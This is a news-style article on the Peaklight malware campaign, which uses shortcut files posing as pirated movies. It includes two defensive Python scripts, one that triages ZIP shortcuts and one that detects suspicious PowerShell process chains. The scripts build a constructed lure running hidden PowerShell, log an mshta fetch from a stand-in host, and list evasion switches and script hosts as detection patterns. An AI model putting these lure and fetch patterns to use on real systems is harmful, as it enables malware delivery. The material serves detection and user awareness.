
Are you downloading a free movie? You may become a victim of “Peaklight”: what is it and how does it work

A recent warning from Mandiant, Google's cybersecurity subsidiary, highlights a new strain of malware called Peaklight that targets people downloading pirated movies. Downloading pirated films already carries legal risk; this campaign adds the risk of infecting a Windows computer with malware that can steal data or hand control of the machine to an attacker.

What is Peaklight malware?

According to a blog post by Mandiant (via Times of India), the first stage of Peaklight runs only in memory, which makes it hard to detect because it leaves no file on the hard drive. Researchers describe it as a memory-only dropper that launches a PowerShell-based downloader called PEAKLIGHT. That downloader then retrieves additional malware for the compromised system, and it is those later payloads that do the actual damage.


Mandiant explains that Peaklight uses an obfuscated PowerShell script to pull further malware onto infected devices. This lets the criminals deliver a variety of malicious programs, including Lumma Stealer, Hijack Loader, and CryptBot, all of which are rented out as malware-as-a-service and used to steal sensitive data or take control of the affected systems.

How cybercriminals use Peaklight

Cybercriminals distribute Peaklight through deceptive video downloads. They hide malicious Windows shortcut (LNK) files inside ZIP archives named after popular films, so the shortcut looks like the video the user was expecting. When a user opens the shortcut, a series of malicious actions occurs:


1. Connection to the hidden source: the LNK file reaches out to a content delivery network (CDN) and pulls down malicious JavaScript. That code is executed directly in memory, so no file is written to the hard drive for a file scanner to find.

2. Downloader activation: the JavaScript launches the PowerShell downloader called PEAKLIGHT, which starts the next stage of the chain.

3. Downloading additional threats: PEAKLIGHT retrieves further malware from the remote server, including Lumma Stealer, Hijack Loader, and CryptBot, which can steal user data or give attackers control of the system.
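The lure in step 1 can be triaged before anyone double-clicks it. The following Python script is an added example, not Mandiant's code and not taken from the report: it builds a constructed ZIP containing a shortcut named like a video file, parses the shortcut's header and StringData according to the MS-SHLLINK layout, and flags a "video" whose command line names a script host. The target path, arguments, file names and the list of script hosts are invented for illustration.

```python
"""Triage a ZIP archive for Windows shortcut (.lnk) lures posing as video files.

Added example, not Mandiant's code. The archive and shortcut are constructed
here to mimic the lure described in the article; the target path, arguments
and file names inside them are invented for illustration.
"""
import io
import struct
import zipfile

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData sections appear in this fixed order when their flag is set
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))

VIDEO_EXTENSIONS = (".mp4", ".mkv", ".avi", ".mov")
# Script hosts a "video" shortcut has no business invoking (assumed list)
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "cmd.exe")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData strings of a .lnk file.
    LinkTargetIDList and LinkInfo are skipped; the command line lives in StringData."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Minimal Unicode .lnk with only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS,
    ShowCommand=7 (SW_SHOWMINNOACTIVE, i.e. a window the victim barely sees)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0,            # FileAttributes
                         0, 0, 0,      # Creation/Access/Write time
                         0, 0,         # FileSize, IconIndex
                         7,            # ShowCommand
                         0, 0, 0, 0)   # HotKey, Reserved1..3

    def sd(s):  # CountCharacters + UTF-16LE text, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments)


def scan_zip(zip_bytes: bytes) -> list:
    """Report every .lnk in the archive: does it pose as a video, and does its
    command line name a script host?"""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            if not lower.endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info))
            except (ValueError, struct.error):
                continue  # malformed shortcut; worth a look by hand
            command = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
            masquerading = lower[:-4].endswith(VIDEO_EXTENSIONS)
            hosts = [h for h in SCRIPT_HOSTS if h in command]
            findings.append({"file": info.filename,
                             "masquerades_as_video": masquerading,
                             "script_hosts": hosts,
                             "window_minimized": fields["show_command"] == 7,
                             "command": command.strip(),
                             "suspicious": masquerading and bool(hosts)})
    return findings


def build_sample_archive() -> bytes:
    """Constructed lure: a 'movie' ZIP whose only video is a shortcut."""
    lnk = build_lnk("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                    '-w hidden -c "hypothetical stage-two fetch goes here"')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Example.Movie.2024.1080p.mp4.lnk", lnk)
        zf.writestr("README.txt", "constructed sample, nothing real here")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_archive()):
        print(finding)
```

Run it against a real download by replacing `build_sample_archive()` with the bytes of the ZIP; a hit on `suspicious` means a file that claims to be a video but is a shortcut that starts a script host, which is the pattern described above.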


The report notes that running Peaklight in memory (RAM) makes it harder to spot. Traditional antivirus tools concentrate on scanning files on the hard drive, and a stage that never writes itself to disk gives them nothing to scan.
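What that means for detection is that the signal is in process behaviour, not in a file on disk. The following is an added example, not Mandiant's detection logic, that applies the chain from the previous section to constructed process-creation records: it alerts on a PowerShell process whose parent chain passes through a script host and that either descends from explorer.exe (a double-clicked shortcut) or carries window-hiding or policy-bypass switches. The record format, the log lines, the script-host list and the flag list are all assumptions made for the example.

```python
"""Flag the shortcut -> script host -> PowerShell chain in process-creation
telemetry rather than on disk. Added example, not Mandiant's detection logic.
The pid|ppid|image|command-line format and the log lines are constructed for
this example; the script-host list and the switches treated as evasive are
assumptions, not indicators published with the report."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
EVASION_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
                 "-nop", "-noprofile", "-ep bypass", "-executionpolicy bypass")

# Constructed telemetry. pid 2020 is the chain the article describes; 2030 is a
# media player opening a real video; 2040 is an admin running a script from a
# shortcut. Only 2020 should alert.
SAMPLE_LOG = """\
100|4|C:\\Windows\\explorer.exe|explorer.exe
2010|100|C:\\Windows\\System32\\mshta.exe|mshta.exe https://cdn.example.invalid/lure
2020|2010|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -nop -c "hypothetical PEAKLIGHT-style loader"
2030|100|C:\\Program Files\\VideoLAN\\VLC\\vlc.exe|vlc.exe Example.Movie.mp4
2040|100|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1
"""


def parse_log(text: str) -> dict:
    """Parse pid|ppid|image|cmdline lines into a pid -> Proc map."""
    procs = {}
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        procs[int(pid)] = Proc(int(pid), int(ppid), image, cmdline)
    return procs


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(procs: dict, pid: int, depth: int = 4) -> list:
    """Walk ppid links upward and return up to `depth` ancestor image names."""
    names = []
    while pid in procs and len(names) < depth:
        names.append(basename(procs[pid].image))
        pid = procs[pid].ppid
    return names


def detect(procs: dict) -> list:
    """Alert on PowerShell launched through a script host that was itself
    started from the shell, or that uses window-hiding / policy-bypass switches.
    Requiring the script-host ancestor keeps ordinary admin scripts quiet."""
    alerts = []
    for p in procs.values():
        if basename(p.image) not in POWERSHELL:
            continue
        parents = ancestry(procs, p.ppid)
        via_script_host = any(n in SCRIPT_HOSTS for n in parents)
        from_explorer = "explorer.exe" in parents
        evasive = [f for f in EVASION_FLAGS if f in p.cmdline.lower()]
        if via_script_host and (from_explorer or evasive):
            alerts.append({"pid": p.pid,
                           "chain": [basename(p.image)] + parents,
                           "evasion_flags": evasive})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert)
```

The point of the lineage check is visible in the sample: pid 2040 also runs PowerShell with `-NoProfile`, but it was started directly from the shell with no script host in between, so it does not fire. In a real deployment the records would come from Sysmon event 1 or an EDR's process-creation feed rather than a constructed string.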

Mandiant researchers Aaron Lee and Praveeth D’Souza state: “PEAKLIGHT is a PowerShell-based obfuscated downloader that is part of a multi-step execution chain that checks for the presence of ZIP archives in hardcoded file paths. If these archives are not present, the downloader contacts the CDN site to download the remotely hosted archive file and save it to disk.”

Users are advised to exercise caution when downloading content from unauthorized sources. In particular, a “video” that turns out to be a Windows shortcut inside a ZIP archive is exactly the lure this campaign relies on and should not be opened.